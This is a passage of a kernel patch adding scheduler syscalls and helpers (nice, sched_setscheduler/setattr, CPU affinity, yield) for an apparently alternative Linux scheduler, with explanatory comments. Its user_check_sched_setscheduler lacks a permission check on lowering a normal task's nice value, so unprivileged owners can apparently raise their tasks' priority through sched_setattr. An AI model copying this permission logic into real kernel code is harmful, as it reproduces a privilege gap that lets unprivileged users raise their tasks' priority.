++	return prio;
++}
++#endif
++
++void set_user_nice(struct task_struct *p, long nice)
++{
++	unsigned long flags;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	if (task_nice(p) == nice || nice < MIN_NICE || nice > MAX_NICE)
++		return;
++	/*
++	 * We have to be careful, if called from sys_setpriority(),
++	 * the task might be in the middle of scheduling on another CPU.
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	rq = __task_access_lock(p, &lock);
++
++	p->static_prio = NICE_TO_PRIO(nice);
++	/*
++	 * The RT priorities are set via sched_setscheduler(), but we still
++	 * allow the 'normal' nice value to be set - but as expected
++	 * it won't have any effect on scheduling until the task becomes
++	 * SCHED_NORMAL/SCHED_BATCH again:
++	 */
++	if (task_has_rt_policy(p))
++		goto out_unlock;
++
++	p->prio = effective_prio(p);
++
++	check_task_changed(p, rq);
++out_unlock:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++}
++EXPORT_SYMBOL(set_user_nice);
++
++/*
++ * is_nice_reduction - check if nice value is an actual reduction
++ *
++ * Similar to can_nice() but does not perform a capability check.
++ *
++ * @p: task
++ * @nice: nice value
++ */
++static bool is_nice_reduction(const struct task_struct *p, const int nice)
++{
++	/* Convert nice value [19,-20] to rlimit style value [1,40]: */
++	int nice_rlim = nice_to_rlimit(nice);
++
++	return (nice_rlim <= task_rlimit(p, RLIMIT_NICE));
++}
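++
++/*
++ * Worked example of the conversion above: nice_to_rlimit() maps the nice
++ * range [19, -20] onto [1, 40], so nice_to_rlimit(0) == 20. A task whose
++ * RLIMIT_NICE is at least 20 therefore passes is_nice_reduction() - and
++ * hence can_nice() - for nice 0 even without CAP_SYS_NICE.
++ */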
++
++/*
++ * can_nice - check if a task can reduce its nice value
++ * @p: task
++ * @nice: nice value
++ */
++int can_nice(const struct task_struct *p, const int nice)
++{
++	return is_nice_reduction(p, nice) || capable(CAP_SYS_NICE);
++}
++
++#ifdef __ARCH_WANT_SYS_NICE
++
++/*
++ * sys_nice - change the priority of the current process.
++ * @increment: priority increment
++ *
++ * sys_setpriority is a more generic, but much slower function that
++ * does similar things.
++ */
++SYSCALL_DEFINE1(nice, int, increment)
++{
++	long nice, retval;
++
++	/*
++	 * Setpriority might change our priority at the same moment.
++	 * We don't have to worry. Conceptually one call occurs first
++	 * and we have a single winner.
++	 */
++
++	increment = clamp(increment, -NICE_WIDTH, NICE_WIDTH);
++	nice = task_nice(current) + increment;
++
++	nice = clamp_val(nice, MIN_NICE, MAX_NICE);
++	if (increment < 0 && !can_nice(current, nice))
++		return -EPERM;
++
++	retval = security_task_setnice(current, nice);
++	if (retval)
++		return retval;
++
++	set_user_nice(current, nice);
++	return 0;
++}
++
++#endif
++
++/**
++ * task_prio - return the priority value of a given task.
++ * @p: the task in question.
++ *
++ * Return: The priority value as seen by users in /proc.
++ *
++ * sched policy              return value    kernel prio     user prio/nice
++ *
++ * (BMQ)normal, batch, idle  [0 ... 53]      [100 ... 139]   0/[-20 ... 19]/[-7 ... 7]
++ * (PDS)normal, batch, idle  [0 ... 39]      100             0/[-20 ... 19]
++ * fifo, rr                  [-1 ... -100]   [99 ... 0]      [0 ... 99]
++ */
++int task_prio(const struct task_struct *p)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio - MAX_RT_PRIO :
++		task_sched_prio_normal(p, task_rq(p));
++}
++
++/**
++ * idle_cpu - is a given CPU idle currently?
++ * @cpu: the processor in question.
++ *
++ * Return: 1 if the CPU is currently idle. 0 otherwise.
++ */
++int idle_cpu(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (rq->curr != rq->idle)
++		return 0;
++
++	if (rq->nr_running)
++		return 0;
++
++#ifdef CONFIG_SMP
++	if (rq->ttwu_pending)
++		return 0;
++#endif
++
++	return 1;
++}
++
++/**
++ * idle_task - return the idle task for a given CPU.
++ * @cpu: the processor in question.
++ *
++ * Return: The idle task for the cpu @cpu.
++ */
++struct task_struct *idle_task(int cpu)
++{
++	return cpu_rq(cpu)->idle;
++}
++
++/**
++ * find_process_by_pid - find a process with a matching PID value.
++ * @pid: the pid in question.
++ *
++ * The task of @pid, if found. %NULL otherwise.
++ */
++static inline struct task_struct *find_process_by_pid(pid_t pid)
++{
++	return pid ? find_task_by_vpid(pid) : current;
++}
++
++/*
++ * sched_setparam() passes in -1 for its policy, to let the functions
++ * it calls know not to change it.
++ */
++#define SETPARAM_POLICY -1
++
++static void __setscheduler_params(struct task_struct *p,
++		const struct sched_attr *attr)
++{
++	int policy = attr->sched_policy;
++
++	if (policy == SETPARAM_POLICY)
++		policy = p->policy;
++
++	p->policy = policy;
++
++	/*
++	 * Allow the normal nice value to be set, but it will have no
++	 * effect on scheduling until the task becomes SCHED_NORMAL/
++	 * SCHED_BATCH.
++	 */
++	p->static_prio = NICE_TO_PRIO(attr->sched_nice);
++
++	/*
++	 * __sched_setscheduler() ensures attr->sched_priority == 0 when
++	 * !rt_policy. Always setting this ensures that things like
++	 * getparam()/getattr() don't report silly values for !rt tasks.
++	 */
++	p->rt_priority = attr->sched_priority;
++	p->normal_prio = normal_prio(p);
++}
++
++/*
++ * check the target process has a UID that matches the current process's
++ */
++static bool check_same_owner(struct task_struct *p)
++{
++	const struct cred *cred = current_cred(), *pcred;
++	bool match;
++
++	rcu_read_lock();
++	pcred = __task_cred(p);
++	match = (uid_eq(cred->euid, pcred->euid) ||
++		 uid_eq(cred->euid, pcred->uid));
++	rcu_read_unlock();
++	return match;
++}
++
++/*
++ * Allow unprivileged RT tasks to decrease priority.
++ * Only issue a capable test if needed and only once to avoid an audit
++ * event on permitted non-privileged operations:
++ */
++static int user_check_sched_setscheduler(struct task_struct *p,
++					 const struct sched_attr *attr,
++					 int policy, int reset_on_fork)
++{
++	if (rt_policy(policy)) {
++		unsigned long rlim_rtprio = task_rlimit(p, RLIMIT_RTPRIO);
++
++		/* Can't set/change the rt policy: */
++		if (policy != p->policy && !rlim_rtprio)
++			goto req_priv;
++
++		/* Can't increase priority: */
++		if (attr->sched_priority > p->rt_priority &&
++		    attr->sched_priority > rlim_rtprio)
++			goto req_priv;
++	}
++
++	/* Can't change other user's priorities: */
++	if (!check_same_owner(p))
++		goto req_priv;
++
++	/* Normal users shall not reset the sched_reset_on_fork flag: */
++	if (p->sched_reset_on_fork && !reset_on_fork)
++		goto req_priv;
++
++	return 0;
++
++req_priv:
++	if (!capable(CAP_SYS_NICE))
++		return -EPERM;
++
++	return 0;
++}
++
++static int __sched_setscheduler(struct task_struct *p,
++				const struct sched_attr *attr,
++				bool user, bool pi)
++{
++	const struct sched_attr dl_squash_attr = {
++		.size		= sizeof(struct sched_attr),
++		.sched_policy	= SCHED_FIFO,
++		.sched_nice	= 0,
++		.sched_priority = 99,
++	};
++	int oldpolicy = -1, policy = attr->sched_policy;
++	int retval, newprio;
++	struct balance_callback *head;
++	unsigned long flags;
++	struct rq *rq;
++	int reset_on_fork;
++	raw_spinlock_t *lock;
++
++	/* The pi code expects interrupts enabled */
++	BUG_ON(pi && in_interrupt());
++
++	/*
++	 * Alt schedule FW supports SCHED_DEADLINE by squashing it into
++	 * SCHED_FIFO using dl_squash_attr above.
++	 */
++	if (unlikely(SCHED_DEADLINE == policy)) {
++		attr = &dl_squash_attr;
++		policy = attr->sched_policy;
++	}
++recheck:
++	/* Double check policy once rq lock held */
++	if (policy < 0) {
++		reset_on_fork = p->sched_reset_on_fork;
++		policy = oldpolicy = p->policy;
++	} else {
++		reset_on_fork = !!(attr->sched_flags & SCHED_RESET_ON_FORK);
++
++		if (policy > SCHED_IDLE)
++			return -EINVAL;
++	}
++
++	if (attr->sched_flags & ~(SCHED_FLAG_ALL))
++		return -EINVAL;
++
++	/*
++	 * Valid priorities for SCHED_FIFO and SCHED_RR are
++	 * 1..MAX_RT_PRIO-1, valid priority for SCHED_NORMAL and
++	 * SCHED_BATCH and SCHED_IDLE is 0.
++	 */
++	if (attr->sched_priority < 0 ||
++	    (p->mm && attr->sched_priority > MAX_RT_PRIO - 1) ||
++	    (!p->mm && attr->sched_priority > MAX_RT_PRIO - 1))
++		return -EINVAL;
++	if ((SCHED_RR == policy || SCHED_FIFO == policy) !=
++	    (attr->sched_priority != 0))
++		return -EINVAL;
++
++	if (user) {
++		retval = user_check_sched_setscheduler(p, attr, policy, reset_on_fork);
++		if (retval)
++			return retval;
++
++		retval = security_task_setscheduler(p);
++		if (retval)
++			return retval;
++	}
++
++	if (pi)
++		cpuset_read_lock();
++
++	/*
++	 * Make sure no PI-waiters arrive (or leave) while we are
++	 * changing the priority of the task:
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++
++	/*
++	 * To be able to change p->policy safely, task_access_lock()
++	 * must be called.
++	 * If task_access_lock() is used here:
++	 * for a task p which is not running, reading rq->stop is
++	 * racy but acceptable, as ->stop doesn't change much.
++	 * An enhancement could be made to read rq->stop safely.
++	 */
++	rq = __task_access_lock(p, &lock);
++
++	/*
++	 * Changing the policy of the stop threads is a very bad idea
++	 */
++	if (p == rq->stop) {
++		retval = -EINVAL;
++		goto unlock;
++	}
++
++	/*
++	 * If not changing anything there's no need to proceed further:
++	 */
++	if (unlikely(policy == p->policy)) {
++		if (rt_policy(policy) && attr->sched_priority != p->rt_priority)
++			goto change;
++		if (!rt_policy(policy) &&
++		    NICE_TO_PRIO(attr->sched_nice) != p->static_prio)
++			goto change;
++
++		p->sched_reset_on_fork = reset_on_fork;
++		retval = 0;
++		goto unlock;
++	}
++change:
++
++	/* Re-check policy now with rq lock held */
++	if (unlikely(oldpolicy != -1 && oldpolicy != p->policy)) {
++		policy = oldpolicy = -1;
++		__task_access_unlock(p, lock);
++		raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++		if (pi)
++			cpuset_read_unlock();
++		goto recheck;
++	}
++
++	p->sched_reset_on_fork = reset_on_fork;
++
++	newprio = __normal_prio(policy, attr->sched_priority, NICE_TO_PRIO(attr->sched_nice));
++	if (pi) {
++		/*
++		 * Take priority boosted tasks into account. If the new
++		 * effective priority is unchanged, we just store the new
++		 * normal parameters and do not touch the scheduler class and
++		 * the runqueue. This will be done when the task deboosts
++		 * itself.
++		 */
++		newprio = rt_effective_prio(p, newprio);
++	}
++
++	if (!(attr->sched_flags & SCHED_FLAG_KEEP_PARAMS)) {
++		__setscheduler_params(p, attr);
++		__setscheduler_prio(p, newprio);
++	}
++
++	check_task_changed(p, rq);
++
++	/* Avoid rq from going away on us: */
++	preempt_disable();
++	head = splice_balance_callbacks(rq);
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++
++	if (pi) {
++		cpuset_read_unlock();
++		rt_mutex_adjust_pi(p);
++	}
++
++	/* Run balance callbacks after we've adjusted the PI chain: */
++	balance_callbacks(rq, head);
++	preempt_enable();
++
++	return 0;
++
++unlock:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++	if (pi)
++		cpuset_read_unlock();
++	return retval;
++}
++
++static int _sched_setscheduler(struct task_struct *p, int policy,
++			       const struct sched_param *param, bool check)
++{
++	struct sched_attr attr = {
++		.sched_policy   = policy,
++		.sched_priority = param->sched_priority,
++		.sched_nice     = PRIO_TO_NICE(p->static_prio),
++	};
++
++	/* Fixup the legacy SCHED_RESET_ON_FORK hack. */
++	if ((policy != SETPARAM_POLICY) && (policy & SCHED_RESET_ON_FORK)) {
++		attr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
++		policy &= ~SCHED_RESET_ON_FORK;
++		attr.sched_policy = policy;
++	}
++
++	return __sched_setscheduler(p, &attr, check, true);
++}
++
++/**
++ * sched_setscheduler - change the scheduling policy and/or RT priority of a thread.
++ * @p: the task in question.
++ * @policy: new policy.
++ * @param: structure containing the new RT priority.
++ *
++ * Use sched_set_fifo(), read its comment.
++ *
++ * Return: 0 on success. An error code otherwise.
++ *
++ * NOTE that the task may already be dead.
++ */
++int sched_setscheduler(struct task_struct *p, int policy,
++		       const struct sched_param *param)
++{
++	return _sched_setscheduler(p, policy, param, true);
++}
++
++int sched_setattr(struct task_struct *p, const struct sched_attr *attr)
++{
++	return __sched_setscheduler(p, attr, true, true);
++}
++
++int sched_setattr_nocheck(struct task_struct *p, const struct sched_attr *attr)
++{
++	return __sched_setscheduler(p, attr, false, true);
++}
++EXPORT_SYMBOL_GPL(sched_setattr_nocheck);
++
++/**
++ * sched_setscheduler_nocheck - change the scheduling policy and/or RT priority of a thread from kernelspace.
++ * @p: the task in question.
++ * @policy: new policy.
++ * @param: structure containing the new RT priority.
++ *
++ * Just like sched_setscheduler, only don't bother checking if the
++ * current context has permission.  For example, this is needed in
++ * stop_machine(): we create temporary high priority worker threads,
++ * but our caller might not have that capability.
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++int sched_setscheduler_nocheck(struct task_struct *p, int policy,
++			       const struct sched_param *param)
++{
++	return _sched_setscheduler(p, policy, param, false);
++}
++
++/*
++ * SCHED_FIFO is a broken scheduler model; that is, it is fundamentally
++ * incapable of resource management, which is the one thing an OS really should
++ * be doing.
++ *
++ * This is of course the reason it is limited to privileged users only.
++ *
++ * Worse still; it is fundamentally impossible to compose static priority
++ * workloads. You cannot take two correctly working static prio workloads
++ * and smash them together and still expect them to work.
++ *
++ * For this reason 'all' FIFO tasks the kernel creates are basically at:
++ *
++ *   MAX_RT_PRIO / 2
++ *
++ * The administrator _MUST_ configure the system, the kernel simply doesn't
++ * know enough information to make a sensible choice.
++ */
++void sched_set_fifo(struct task_struct *p)
++{
++	struct sched_param sp = { .sched_priority = MAX_RT_PRIO / 2 };
++	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
++}
++EXPORT_SYMBOL_GPL(sched_set_fifo);
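++
++/*
++ * Sketch of typical in-kernel usage (the kthread function and its name
++ * are illustrative only):
++ *
++ *	struct task_struct *t;
++ *
++ *	t = kthread_create(worker_fn, NULL, "example-rt");
++ *	if (!IS_ERR(t)) {
++ *		sched_set_fifo(t);
++ *		wake_up_process(t);
++ *	}
++ */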
++
++/*
++ * For when you don't much care about FIFO, but want to be above SCHED_NORMAL.
++ */
++void sched_set_fifo_low(struct task_struct *p)
++{
++	struct sched_param sp = { .sched_priority = 1 };
++	WARN_ON_ONCE(sched_setscheduler_nocheck(p, SCHED_FIFO, &sp) != 0);
++}
++EXPORT_SYMBOL_GPL(sched_set_fifo_low);
++
++void sched_set_normal(struct task_struct *p, int nice)
++{
++	struct sched_attr attr = {
++		.sched_policy = SCHED_NORMAL,
++		.sched_nice = nice,
++	};
++	WARN_ON_ONCE(sched_setattr_nocheck(p, &attr) != 0);
++}
++EXPORT_SYMBOL_GPL(sched_set_normal);
++
++static int
++do_sched_setscheduler(pid_t pid, int policy, struct sched_param __user *param)
++{
++	struct sched_param lparam;
++	struct task_struct *p;
++	int retval;
++
++	if (!param || pid < 0)
++		return -EINVAL;
++	if (copy_from_user(&lparam, param, sizeof(struct sched_param)))
++		return -EFAULT;
++
++	rcu_read_lock();
++	retval = -ESRCH;
++	p = find_process_by_pid(pid);
++	if (likely(p))
++		get_task_struct(p);
++	rcu_read_unlock();
++
++	if (likely(p)) {
++		retval = sched_setscheduler(p, policy, &lparam);
++		put_task_struct(p);
++	}
++
++	return retval;
++}
++
++/*
++ * Mimics kernel/events/core.c perf_copy_attr().
++ */
++static int sched_copy_attr(struct sched_attr __user *uattr, struct sched_attr *attr)
++{
++	u32 size;
++	int ret;
++
++	/* Zero the full structure, so that a short copy will be nice: */
++	memset(attr, 0, sizeof(*attr));
++
++	ret = get_user(size, &uattr->size);
++	if (ret)
++		return ret;
++
++	/* ABI compatibility quirk: */
++	if (!size)
++		size = SCHED_ATTR_SIZE_VER0;
++
++	if (size < SCHED_ATTR_SIZE_VER0 || size > PAGE_SIZE)
++		goto err_size;
++
++	ret = copy_struct_from_user(attr, sizeof(*attr), uattr, size);
++	if (ret) {
++		if (ret == -E2BIG)
++			goto err_size;
++		return ret;
++	}
++
++	/*
++	 * XXX: Do we want to be lenient like existing syscalls; or do we want
++	 * to be strict and return an error on out-of-bounds values?
++	 */
++	attr->sched_nice = clamp(attr->sched_nice, -20, 19);
++
++	/* sched/core.c uses zero here but we already know ret is zero */
++	return 0;
++
++err_size:
++	put_user(sizeof(*attr), &uattr->size);
++	return -E2BIG;
++}
++
++/**
++ * sys_sched_setscheduler - set/change the scheduler policy and RT priority
++ * @pid: the pid in question.
++ * @policy: new policy.
++ * @param: structure containing the new RT priority.
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++SYSCALL_DEFINE3(sched_setscheduler, pid_t, pid, int, policy, struct sched_param __user *, param)
++{
++	if (policy < 0)
++		return -EINVAL;
++
++	return do_sched_setscheduler(pid, policy, param);
++}
++
++/**
++ * sys_sched_setparam - set/change the RT priority of a thread
++ * @pid: the pid in question.
++ * @param: structure containing the new RT priority.
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++SYSCALL_DEFINE2(sched_setparam, pid_t, pid, struct sched_param __user *, param)
++{
++	return do_sched_setscheduler(pid, SETPARAM_POLICY, param);
++}
++
++/**
++ * sys_sched_setattr - same as above, but with extended sched_attr
++ * @pid: the pid in question.
++ * @uattr: structure containing the extended parameters.
++ * @flags: for future extension.
++ */
++SYSCALL_DEFINE3(sched_setattr, pid_t, pid, struct sched_attr __user *, uattr,
++			       unsigned int, flags)
++{
++	struct sched_attr attr;
++	struct task_struct *p;
++	int retval;
++
++	if (!uattr || pid < 0 || flags)
++		return -EINVAL;
++
++	retval = sched_copy_attr(uattr, &attr);
++	if (retval)
++		return retval;
++
++	if ((int)attr.sched_policy < 0)
++		return -EINVAL;
++
++	rcu_read_lock();
++	retval = -ESRCH;
++	p = find_process_by_pid(pid);
++	if (likely(p))
++		get_task_struct(p);
++	rcu_read_unlock();
++
++	if (likely(p)) {
++		retval = sched_setattr(p, &attr);
++		put_task_struct(p);
++	}
++
++	return retval;
++}
++
++/**
++ * sys_sched_getscheduler - get the policy (scheduling class) of a thread
++ * @pid: the pid in question.
++ *
++ * Return: On success, the policy of the thread. Otherwise, a negative error
++ * code.
++ */
++SYSCALL_DEFINE1(sched_getscheduler, pid_t, pid)
++{
++	struct task_struct *p;
++	int retval = -EINVAL;
++
++	if (pid < 0)
++		goto out_nounlock;
++
++	retval = -ESRCH;
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	if (p) {
++		retval = security_task_getscheduler(p);
++		if (!retval)
++			retval = p->policy;
++	}
++	rcu_read_unlock();
++
++out_nounlock:
++	return retval;
++}
++
++/**
++ * sys_sched_getparam - get the RT priority of a thread
++ * @pid: the pid in question.
++ * @param: structure containing the RT priority.
++ *
++ * Return: On success, 0 and the RT priority is in @param. Otherwise, an error
++ * code.
++ */
++SYSCALL_DEFINE2(sched_getparam, pid_t, pid, struct sched_param __user *, param)
++{
++	struct sched_param lp = { .sched_priority = 0 };
++	struct task_struct *p;
++	int retval = -EINVAL;
++
++	if (!param || pid < 0)
++		goto out_nounlock;
++
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	retval = -ESRCH;
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++
++	if (task_has_rt_policy(p))
++		lp.sched_priority = p->rt_priority;
++	rcu_read_unlock();
++
++	/*
++	 * This one might sleep, we cannot do it with a spinlock held ...
++	 */
++	retval = copy_to_user(param, &lp, sizeof(*param)) ? -EFAULT : 0;
++
++out_nounlock:
++	return retval;
++
++out_unlock:
++	rcu_read_unlock();
++	return retval;
++}
++
++/*
++ * Copy the kernel size attribute structure (which might be larger
++ * than what user-space knows about) to user-space.
++ *
++ * Note that all cases are valid: user-space buffer can be larger or
++ * smaller than the kernel-space buffer. The usual case is that both
++ * have the same size.
++ */
++static int
++sched_attr_copy_to_user(struct sched_attr __user *uattr,
++			struct sched_attr *kattr,
++			unsigned int usize)
++{
++	unsigned int ksize = sizeof(*kattr);
++
++	if (!access_ok(uattr, usize))
++		return -EFAULT;
++
++	/*
++	 * sched_getattr() ABI forwards and backwards compatibility:
++	 *
++	 * If usize == ksize then we just copy everything to user-space and all is good.
++	 *
++	 * If usize < ksize then we only copy as much as user-space has space for,
++	 * this keeps ABI compatibility as well. We skip the rest.
++	 *
++	 * If usize > ksize then user-space is using a newer version of the ABI,
++	 * parts of which the kernel doesn't know about. Just ignore it - tooling can
++	 * detect the kernel's knowledge of attributes from the attr->size value
++	 * which is set to ksize in this case.
++	 */
++	kattr->size = min(usize, ksize);
++
++	if (copy_to_user(uattr, kattr, kattr->size))
++		return -EFAULT;
++
++	return 0;
++}
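++
++/*
++ * Worked example: a binary built against the first published sched_attr
++ * passes usize == SCHED_ATTR_SIZE_VER0 (48 bytes). If the running kernel's
++ * sched_attr has since grown, only those first 48 bytes are copied out and
++ * kattr->size is reported as 48, so the caller sees exactly the ABI it was
++ * compiled against.
++ */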
++
++/**
++ * sys_sched_getattr - similar to sched_getparam, but with sched_attr
++ * @pid: the pid in question.
++ * @uattr: structure containing the extended parameters.
++ * @usize: sizeof(attr) for fwd/bwd comp.
++ * @flags: for future extension.
++ */
++SYSCALL_DEFINE4(sched_getattr, pid_t, pid, struct sched_attr __user *, uattr,
++		unsigned int, usize, unsigned int, flags)
++{
++	struct sched_attr kattr = { };
++	struct task_struct *p;
++	int retval;
++
++	if (!uattr || pid < 0 || usize > PAGE_SIZE ||
++	    usize < SCHED_ATTR_SIZE_VER0 || flags)
++		return -EINVAL;
++
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	retval = -ESRCH;
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++
++	kattr.sched_policy = p->policy;
++	if (p->sched_reset_on_fork)
++		kattr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
++	if (task_has_rt_policy(p))
++		kattr.sched_priority = p->rt_priority;
++	else
++		kattr.sched_nice = task_nice(p);
++	kattr.sched_flags &= SCHED_FLAG_ALL;
++
++#ifdef CONFIG_UCLAMP_TASK
++	kattr.sched_util_min = p->uclamp_req[UCLAMP_MIN].value;
++	kattr.sched_util_max = p->uclamp_req[UCLAMP_MAX].value;
++#endif
++
++	rcu_read_unlock();
++
++	return sched_attr_copy_to_user(uattr, &kattr, usize);
++
++out_unlock:
++	rcu_read_unlock();
++	return retval;
++}
++
++static int
++__sched_setaffinity(struct task_struct *p, const struct cpumask *mask)
++{
++	int retval;
++	cpumask_var_t cpus_allowed, new_mask;
++
++	if (!alloc_cpumask_var(&cpus_allowed, GFP_KERNEL))
++		return -ENOMEM;
++
++	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL)) {
++		retval = -ENOMEM;
++		goto out_free_cpus_allowed;
++	}
++
++	cpuset_cpus_allowed(p, cpus_allowed);
++	cpumask_and(new_mask, mask, cpus_allowed);
++again:
++	retval = __set_cpus_allowed_ptr(p, new_mask, SCA_CHECK | SCA_USER);
++	if (retval)
++		goto out_free_new_mask;
++
++	cpuset_cpus_allowed(p, cpus_allowed);
++	if (!cpumask_subset(new_mask, cpus_allowed)) {
++		/*
++		 * We must have raced with a concurrent cpuset
++		 * update. Just reset the cpus_allowed to the
++		 * cpuset's cpus_allowed
++		 */
++		cpumask_copy(new_mask, cpus_allowed);
++		goto again;
++	}
++
++out_free_new_mask:
++	free_cpumask_var(new_mask);
++out_free_cpus_allowed:
++	free_cpumask_var(cpus_allowed);
++	return retval;
++}
++
++long sched_setaffinity(pid_t pid, const struct cpumask *in_mask)
++{
++	struct task_struct *p;
++	int retval;
++
++	rcu_read_lock();
++
++	p = find_process_by_pid(pid);
++	if (!p) {
++		rcu_read_unlock();
++		return -ESRCH;
++	}
++
++	/* Prevent p going away */
++	get_task_struct(p);
++	rcu_read_unlock();
++
++	if (p->flags & PF_NO_SETAFFINITY) {
++		retval = -EINVAL;
++		goto out_put_task;
++	}
++
++	if (!check_same_owner(p)) {
++		rcu_read_lock();
++		if (!ns_capable(__task_cred(p)->user_ns, CAP_SYS_NICE)) {
++			rcu_read_unlock();
++			retval = -EPERM;
++			goto out_put_task;
++		}
++		rcu_read_unlock();
++	}
++
++	retval = security_task_setscheduler(p);
++	if (retval)
++		goto out_put_task;
++
++	retval = __sched_setaffinity(p, in_mask);
++out_put_task:
++	put_task_struct(p);
++	return retval;
++}
++
++static int get_user_cpu_mask(unsigned long __user *user_mask_ptr, unsigned len,
++			     struct cpumask *new_mask)
++{
++	if (len < cpumask_size())
++		cpumask_clear(new_mask);
++	else if (len > cpumask_size())
++		len = cpumask_size();
++
++	return copy_from_user(new_mask, user_mask_ptr, len) ? -EFAULT : 0;
++}
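++
++/*
++ * Example of the length handling above: with cpumask_size() == 8, a caller
++ * passing len == 4 has the upper four bytes of new_mask cleared and only
++ * the lower four copied in, while a caller passing len == 16 simply has
++ * the excess user bytes ignored.
++ */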
++
++/**
++ * sys_sched_setaffinity - set the CPU affinity of a process
++ * @pid: pid of the process
++ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
++ * @user_mask_ptr: user-space pointer to the new CPU mask
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++SYSCALL_DEFINE3(sched_setaffinity, pid_t, pid, unsigned int, len,
++		unsigned long __user *, user_mask_ptr)
++{
++	cpumask_var_t new_mask;
++	int retval;
++
++	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL))
++		return -ENOMEM;
++
++	retval = get_user_cpu_mask(user_mask_ptr, len, new_mask);
++	if (retval == 0)
++		retval = sched_setaffinity(pid, new_mask);
++	free_cpumask_var(new_mask);
++	return retval;
++}
++
++long sched_getaffinity(pid_t pid, cpumask_t *mask)
++{
++	struct task_struct *p;
++	raw_spinlock_t *lock;
++	unsigned long flags;
++	int retval;
++
++	rcu_read_lock();
++
++	retval = -ESRCH;
++	p = find_process_by_pid(pid);
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++
++	task_access_lock_irqsave(p, &lock, &flags);
++	cpumask_and(mask, &p->cpus_mask, cpu_active_mask);
++	task_access_unlock_irqrestore(p, lock, &flags);
++
++out_unlock:
++	rcu_read_unlock();
++
++	return retval;
++}
++
++/**
++ * sys_sched_getaffinity - get the CPU affinity of a process
++ * @pid: pid of the process
++ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
++ * @user_mask_ptr: user-space pointer to hold the current CPU mask
++ *
++ * Return: size of CPU mask copied to user_mask_ptr on success. An
++ * error code otherwise.
++ */
++SYSCALL_DEFINE3(sched_getaffinity, pid_t, pid, unsigned int, len,
++		unsigned long __user *, user_mask_ptr)
++{
++	int ret;
++	cpumask_var_t mask;
++
++	if ((len * BITS_PER_BYTE) < nr_cpu_ids)
++		return -EINVAL;
++	if (len & (sizeof(unsigned long)-1))
++		return -EINVAL;
++
++	if (!alloc_cpumask_var(&mask, GFP_KERNEL))
++		return -ENOMEM;
++
++	ret = sched_getaffinity(pid, mask);
++	if (ret == 0) {
++		unsigned int retlen = min_t(size_t, len, cpumask_size());
++
++		if (copy_to_user(user_mask_ptr, mask, retlen))
++			ret = -EFAULT;
++		else
++			ret = retlen;
++	}
++	free_cpumask_var(mask);
++
++	return ret;
++}
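++
++/*
++ * Illustrative user-space counterpart, via the glibc wrapper (which passes
++ * sizeof(cpu_set_t) as @len and normalizes the return value to 0):
++ *
++ *	cpu_set_t set;
++ *
++ *	if (sched_getaffinity(0, sizeof(set), &set) == 0 &&
++ *	    CPU_ISSET(0, &set))
++ *		;	// the calling task may run on CPU0
++ */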
++
++static void do_sched_yield(void)
++{
++	struct rq *rq;
++	struct rq_flags rf;
++
++	if (!sched_yield_type)
++		return;
++
++	rq = this_rq_lock_irq(&rf);
++
++	schedstat_inc(rq->yld_count);
++
++	if (1 == sched_yield_type) {
++		if (!rt_task(current))
++			do_sched_yield_type_1(current, rq);
++	} else if (2 == sched_yield_type) {
++		if (rq->nr_running > 1)
++			rq->skip = current;
++	}
++
++	preempt_disable();
++	raw_spin_unlock_irq(&rq->lock);
++	sched_preempt_enable_no_resched();
++
++	schedule();
++}
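++
++/*
++ * Summary of the sched_yield_type values handled above:
++ *
++ *	0 - sys_sched_yield() is a no-op
++ *	1 - do_sched_yield_type_1() is applied to non-RT tasks
++ *	2 - the yielding task is set as rq->skip, so choose_next_task()
++ *	    prefers another runnable task if one exists
++ */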
++
++/**
++ * sys_sched_yield - yield the current processor to other threads.
++ *
++ * This function yields the current CPU to other tasks. If there are no
++ * other threads running on this CPU then this function will return.
++ *
++ * Return: 0.
++ */
++SYSCALL_DEFINE0(sched_yield)
++{
++	do_sched_yield();
++	return 0;
++}
++
++#if !defined(CONFIG_PREEMPTION) || defined(CONFIG_PREEMPT_DYNAMIC)
++int __sched __cond_resched(void)
++{
++	if (should_resched(0)) {
++		preempt_schedule_common();
++		return 1;
++	}
++	/*
++	 * In preemptible kernels, ->rcu_read_lock_nesting tells the tick
++	 * whether the current CPU is in an RCU read-side critical section,
++	 * so the tick can report quiescent states even for CPUs looping
++	 * in kernel context.  In contrast, in non-preemptible kernels,
++	 * RCU readers leave no in-memory hints, which means that CPU-bound
++	 * processes executing in kernel context might never report an
++	 * RCU quiescent state.  Therefore, the following code causes
++	 * cond_resched() to report a quiescent state, but only when RCU
++	 * is in urgent need of one.
++	 */
++#ifndef CONFIG_PREEMPT_RCU
++	rcu_all_qs();
++#endif
++	return 0;
++}
++EXPORT_SYMBOL(__cond_resched);
++#endif
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#define cond_resched_dynamic_enabled	__cond_resched
